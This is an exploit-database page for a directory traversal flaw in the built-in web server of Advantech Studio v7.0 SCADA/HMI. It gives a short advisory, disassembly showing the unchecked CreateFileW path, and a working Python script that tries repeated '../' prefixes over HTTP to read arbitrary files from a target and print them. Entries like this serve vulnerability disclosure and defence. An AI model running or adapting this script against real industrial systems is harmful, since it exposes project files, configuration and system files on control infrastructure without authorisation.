header-logo
Suggest Exploit
vendor:
Studio
by:
Nin3
N/A
CVSS
N/A
Directory Traversal
22
CWE
Product Name: Studio
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:advantech:studio:7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2012

Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day

Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe, the web server is a standalone executable that is used along side every project to serve as a web based management system with the help of an activex. The flaw occurs because of a lack of any check on the path of the file requested. This allows an attacker to read any file on the system, including the project files and the web server configuration file.

Mitigation:

Ensure that the path of the file requested is properly checked.
Source

Exploit-DB raw data:

# Exploit Title: Advantech Studio v7.0 SCADA/HMI Directory Traversal 0-day
# Google Dork: N/A
# Date: 2012-12-03
# Exploit Author: Nin3
# Vendor Homepage: http://advantech.com.tw
# Version: 7.0 Build Number 0501.1111.0402.0000
# Tested on: Windows
# CVE : N/A

'''
Advantech Studio v7.0 SCADA/HMI has a built in web server NTWebServer.exe,
the web server is a standalone executable that is used along side every project'
to serve as a web based management system with the help of an activex.

The flaw occurs because of a lack of any check on the path of the file requested. in
function sub_401A90:

.text:00402A4A                 push    0               ; dwFlagsAndAttributes
.text:00402A4C                 push    3               ; dwCreationDisposition
.text:00402A4E                 push    3               ; dwShareMode
.text:00402A50                 push    80000000h       ; dwDesiredAccess
.text:00402A55                 mov     edx, [ebp+lpFileName]
.text:00402A58                 push    edx             ; lpFileName
.text:00402A59                 lea     ecx, [ebp+var_1C]
.text:00402A5C                 call    sub_401A90


sub_401A90 use CreateFileW function directly.

.text:00401A97                 push    0               ; hTemplateFile
.text:00401A99                 mov     eax, [ebp+dwFlagsAndAttributes]
.text:00401A9C                 push    eax             ; dwFlagsAndAttributes
.text:00401A9D                 mov     ecx, [ebp+dwCreationDisposition]
.text:00401AA0                 push    ecx             ; dwCreationDisposition
.text:00401AA1                 push    0               ; lpSecurityAttributes
.text:00401AA3                 mov     edx, [ebp+dwShareMode]
.text:00401AA6                 push    edx             ; dwShareMode
.text:00401AA7                 mov     eax, [ebp+dwDesiredAccess]
.text:00401AAA                 push    eax             ; dwDesiredAccess
.text:00401AAB                 mov     ecx, [ebp+lpFileName]
.text:00401AAE                 push    ecx             ; lpFileName
.text:00401AAF                 call    ds:CreateFileW

'''
import argparse
import httplib

MAX_NESTED_DIRECTORY = 32

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-d')
    parser.add_argument('-p')
    parser.add_argument('-f')  
    args = parser.parse_args()
    if args.d == None or args.p == None or args.f == None:
        print "[!]EXAMPLE USAGE: traverse.py -d 127.0.0.1 -p 80 -f windows/system.ini"
        return
    httpConn = httplib.HTTPConnection(args.d, int(args.p))
    for i in xrange(0, MAX_NESTED_DIRECTORY):
        temp = MakePath(args.f, i)
        httpConn.request('GET', temp)
        resp = httpConn.getresponse()
        content =  resp.read()
        if resp.status == 404:
            print 'Not found ' + temp
        else:
            print 'Found ' + temp
            print'------------------------------------------'
            print content
            print'---------------------------------------EOF'
            break
        
    
    
def MakePath(f, count):
    a = ""
    for i in xrange(0, count):
        a = a + "../"
    return a + f

if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR